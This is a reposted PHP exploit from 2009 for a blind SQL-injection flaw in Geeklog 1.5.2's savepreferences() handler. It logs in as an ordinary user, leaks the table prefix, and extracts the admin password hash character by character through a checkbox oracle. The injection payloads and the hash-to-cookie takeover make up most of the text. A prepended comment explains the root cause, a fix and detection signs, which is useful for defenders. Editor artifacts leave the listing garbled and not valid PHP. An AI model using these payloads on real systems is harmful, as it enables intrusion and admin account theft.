Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
来源:http://retrogod.altervista.org/ 作者:bookoo 发布时间:2009-04-17  
<?php
/*
 * [review] Listing of a blind boolean SQL-injection tool aimed at the
 * savepreferences() handler in Geeklog's usersettings.php. Read it as a
 * defender: it documents the request shape to detect and the server-side
 * bug to fix.
 *
 * Extraction note: the "___FCKpd___0" tokens and the collapsed lines are an
 * artifact of the site's page editor; the listing as rendered here is not
 * valid PHP.
 *
 * Root cause (see the usersettings.php excerpt in the author's comment
 * below): $BOXES is taken straight from the posted array and joined with ','
 * into a "bid NOT IN (...)" clause with no quotes around it, so addslashes()
 * cannot help - it only escapes quote characters and the injected text needs
 * none. Server-side fix: coerce every element to an integer (for example
 * array_map('intval', $BOXES)) before building the IN list, or build the list
 * from placeholders of a prepared statement.
 *
 * Second issue noted by the author: the block checkboxes are named after the
 * real database table (prefix + "blocks[]"), so the table prefix leaks into
 * the HTML. Form field names should not be derived from table names.
 *
 * Structure of the tool:
 *   - CLI / curl-extension checks, syntax() usage text, argv and option
 *     parsing (--proxy, --port, --uid, --skiptest, --test, --c).
 *   - _s(): curl wrapper; GET or POST with a Cookie header, optional proxy,
 *     response headers included in the returned body.
 *   - chk_err(): the hex string decodes to "An SQL error has occurred", the
 *     text the tool looks for in the response; run_test() uses it as the
 *     vulnerability check.
 *   - login(): posts the user/password pair to users.php and harvests the
 *     Set-Cookie values from the response headers.
 *   - xtrct_prefix(): reads the table prefix from the name of the "blocks[]"
 *     input on the preferences page.
 *   - is_checked(): whether the first "blocks[]" checkbox renders "checked".
 *   - main loop: one POST per candidate character of the target row's passwd
 *     column (row chosen by $where, i.e. the uid), a GET to read the checkbox
 *     state, and a reset POST after each hit (the 0x61646d696e5f626c6f636b
 *     literal is the string 'admin_block').
 *
 * Detection: a burst of POST requests to usersettings.php with
 * mode=savepreferences whose "<prefix>blocks[0]" value is non-numeric
 * (contains ')', UNION, SELECT), each followed by a GET of the same page, all
 * under one authenticated session. The preliminary test also makes the server
 * produce its SQL error page, which should be logged and alerted on.
 */
    /*
    Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
    by Nine:Situations:Group::bookoo
     
    our site: http://retrogod.altervista.org/
    software site: http://www.geeklog.net/
     
    PHP and MySQL version independent
     
    vulnerability, see usersettings.php near lines 1467 - 1480:
     
    ...
    if (isset (
___FCKpd___0
USER['uid']) && (
___FCKpd___0
USER['uid'] > 1)) { switch ($mode) { case 'saveuser': savepreferences (
___FCKpd___0
POST); $display .= saveuser(
___FCKpd___0
POST); PLG_profileExtrasSave (); break; case 'savepreferences': savepreferences (
___FCKpd___0
POST); $display .= COM_refresh (
___FCKpd___0
CONF['site_url'] . '/usersettings.php?mode=preferences&amp;msg=6'); break; ... all the
___FCKpd___0
POST[] variables are passed to the savepreferences() function now look the function always in usersettings.php: ... function savepreferences($A) { global
___FCKpd___0
CONF,
___FCKpd___0
TABLES,
___FCKpd___0
USER; if (isset ($A['noicons']) && ($A['noicons'] == 'on')) { $A['noicons'] = 1; } else { $A['noicons'] = 0; } if (isset ($A['willing']) && ($A['willing'] == 'on')) { $A['willing'] = 1; } else { $A['willing'] = 0; } if (isset ($A['noboxes']) && ($A['noboxes'] == 'on')) { $A['noboxes'] = 1; } else { $A['noboxes'] = 0; } if (isset ($A['emailfromadmin']) && ($A['emailfromadmin'] == 'on')) { $A['emailfromadmin'] = 1; } else { $A['emailfromadmin'] = 0; } if (isset ($A['emailfromuser']) && ($A['emailfromuser'] == 'on')) { $A['emailfromuser'] = 1; } else { $A['emailfromuser'] = 0; } if (isset ($A['showonline']) && ($A['showonline'] == 'on')) { $A['showonline'] = 1; } else { $A['showonline'] = 0; } $A['maxstories'] = COM_applyFilter ($A['maxstories'], true); if (empty ($A['maxstories'])) { $A['maxstories'] = 0; } else if ($A['maxstories'] > 0) { if ($A['maxstories'] <
___FCKpd___0
CONF['minnews']) { $A['maxstories'] =
___FCKpd___0
CONF['minnews']; } } $TIDS = @array_values($A[
___FCKpd___0
TABLES['topics']]); $AIDS = @array_values($A['selauthors']); $BOXES = @array_values($A["{
___FCKpd___0
TABLES['blocks']}"]); //<--------- this is
___FCKpd___0
POST[(prefix)blocks] $ETIDS = @array_values($A['etids']); $tids = ''; if (sizeof ($TIDS) > 0) { $tids = addslashes (implode (' ', $TIDS)); } $aids = ''; if (sizeof ($AIDS) > 0) { $aids = addslashes (implode (' ', $AIDS)); } $selectedblocks = ''; if (count ($BOXES) > 0) { $boxes = addslashes (implode (',', $BOXES)); //<---------- this addslashes() is totally unuseful //**** SQL INJECTION HERE *** $boxes is not surrounded by quotes! $blockresult = DB_query("SELECT bid,name FROM {
___FCKpd___0
TABLES['blocks']} WHERE bid NOT IN ($boxes)"); $numRows = DB_numRows($blockresult); for ($x = 1; $x <= $numRows; $x++) { $row = DB_fetchArray ($blockresult); if ($row['name'] <> 'user_block' AND $row['name'] <> 'admin_block' AND $row['name'] <> 'section_block') { $selectedblocks .= $row['bid']; if ($x <> $numRows) { $selectedblocks .= ' '; } } } } ... read the lines commented! This tool extracts the admin hash from db by asking true/false questions to MySQL and interpreting some checkboxes in response, but requires a simple user account. vulnerability ii, information disclosure: now I see that table prefix is showed inside html because they used table names for the
___FCKpd___0
TABLES[] array */ $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : nil; } else { !dl("php_curl.so") ? die($err[1]) : nil; } } function syntax() { print ( "Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n". "Options: \n". "--c:[uid:hash ] - use your user cookie, instead of uses/pwd pair \n". "--port:[port] - specify a port \n". " default->80 \n". "--uid:[n] - specify an uid other than default (2,usually admin)\n". "--proxy:[host:port] - use proxy \n". "--skiptest - skip preliminary tests \n". "--test - run only tests \n". "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ bookoo pass \n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --proxy:1.1.1.1:8080\n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --uid:3 \n". " php ".$argv[0]." 192.168.0.1 /geeklog/ * * -c:3:5f4dcc3b5aa765d61d8327deb882cf99"); die(); } error_reporting(E_ALL ^ E_NOTICE); $host = $argv[1]; $path = $argv[2];
___FCKpd___0
user = $argv[3];
___FCKpd___0
pwd = $argv[4]; //default $uid = "2"; $where = "uid=$uid"; //user id, usually admin, anonymous = 1 $argv[4] ? print("[*] Attacking...\n") : syntax();
// Defaults for the command-line options consumed by the argv loop below.
___FCKpd___0
use_proxy = false; $port = 80;
___FCKpd___0
skiptest = false;
___FCKpd___0
test = false;
___FCKpd___0
use_ck = false; for ($i = 3; $i < $argc; $i++) { if (stristr($argv[$i], "--proxy:")) {
___FCKpd___0
use_proxy = true; $tmp = explode(":", $argv[$i]); $proxy_host = $tmp[1]; $proxy_port = (int)$tmp[2]; } if (stristr($argv[$i], "--port:")) { $tmp = explode(":", $argv[$i]); $port = (int)$tmp[1]; } if (stristr($argv[$i], "--uid")) { $tmp = explode(":", $argv[$i]); $uid = (int)$tmp[1]; $where = "uid=$uid"; } if (stristr($argv[$i], "--skiptest")) {
___FCKpd___0
skiptest = true; } if (stristr($argv[$i], "--test")) {
___FCKpd___0
test = true; } if (stristr($argv[$i], "--c")) {
___FCKpd___0
use_ck = true; $tmp = explode(":", $argv[$i]); $tmp[1] = (int)$tmp[1]; $cookies = "geeklog=".$tmp[1]."; password=".$tmp[2].";"; } } function _s($url, $ck, $is_post, $request) { global
___FCKpd___0
use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n"); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_HEADER, 1); $cookies = array("Cookie: ".$ck); curl_setopt($ch, CURLOPT_HTTPHEADER, $cookies); if (
___FCKpd___0
use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); }
// A transport-level curl failure aborts the whole run; the handle is only closed on success.
___FCKpd___0
d = curl_exec($ch); if (curl_errno($ch)) { die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return
___FCKpd___0
d; } function chk_err($s) { if (stripos ($s, "\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\x72\x72\x65\x64")) { return true; } else { return false; } } function run_test() { global $host, $port, $path, $cookies, $url, $prefix;
// run_test(): a single unbalanced ")" in blocks[0] is enough to make the vulnerable query fail;
// chk_err() then looks for the DB error text in the response. A server that logs SQL errors
// records this probe, which is the earliest point at which the activity can be spotted.
___FCKpd___0
sql = ")"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode(
___FCKpd___0
sql)."&"); if (chk_err($out)) { print("[*] Vulnerable!\n"); } else { die ("[!] Not vulnerable ..."); } } function login() { global $host, $port, $path,
___FCKpd___0
user,
___FCKpd___0
pwd; $url = "http://$host:$port".$path."users.php"; $out = _s($url, "", 1, "loginname=
___FCKpd___0
user&passwd=
___FCKpd___0
pwd&submit=Login"); $tmp = explode("\x0d\x0a\x0d\x0a", $out); $tmp = explode("\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20", $tmp[0]); $cookies = ""; for ($i = 1; $i < count($tmp); $i++) { $tmp_i = explode(";", $tmp[$i]); $cookies .= $tmp_i[0]."; "; } if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) { return $cookies; } else { die("[*] Unable to login!"); } } function xtrct_prefix() { global $host, $port, $path, $cookies, $url; $out = _s($url, $cookies, 0, ""); $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); if (count($tmp) < 2) { die("[!] Not logged in!"); } $tmp = explode("\x22", $tmp[0]); $prefix = $tmp[count($tmp)-1]; return $prefix; } function is_checked() { global $host, $port, $path, $cookies, $url; $out = _s($url, $cookies, 0, ""); $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); $tmp = explode("\x3e", $tmp[1]); $s = $tmp[0]; if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) { return 1; } else { return 0; } } if (!
___FCKpd___0
use_ck) { $cookies = login(); } $url = "http://$host:$port".$path."usersettings.php"; $prefix = xtrct_prefix(); print "[*] prefix->'".$prefix."'\n"; if (!
___FCKpd___0
skiptest) { run_test(); } if (
___FCKpd___0
test) { die; } #uncheck all boxes $rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE ".$where." LIMIT 1/*"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); #then start extraction $c = array(); $c = array_merge($c, range(0x30, 0x39)); $c = array_merge($c, range(0x61, 0x66)); $url = "http://$host:$port".$path;
// Extraction loop: the candidate set $c is 0-9 and a-f (a hex digest); one POST per candidate,
// a GET via is_checked() to read the checkbox oracle, and a reset POST after each hit. That
// repeated POST/GET pair against usersettings.php under one session is the behaviour to alert on.
___FCKpd___0
hash = ""; print ("[*] Initiating hash extraction ...\n"); for ($j = 1; $j < 0x21; $j++) { for ($i = 0; $i <= 0xff; $i++) { $f = false; if (in_array($i, $c)) { $sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR 1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*"; $url = "http://$host:$port".$path."usersettings.php"; $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&"); if (is_checked()) { $f = true;
___FCKpd___0
hash .= chr($i); print "[*] Md5 Hash: ".
___FCKpd___0
hash.str_repeat("?", 0x20-$j)."\n"; #if found , uncheck again $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); break; } } } if ($f == false) { die("\n[!] Unknown error ..."); } } print "[*] Done! Cookie: geeklog=$uid; password=".
___FCKpd___0
hash.";\n"; ?> original url: http://retrogod.altervista.org/9sg_geeklog_152_usersettings_sql.html

 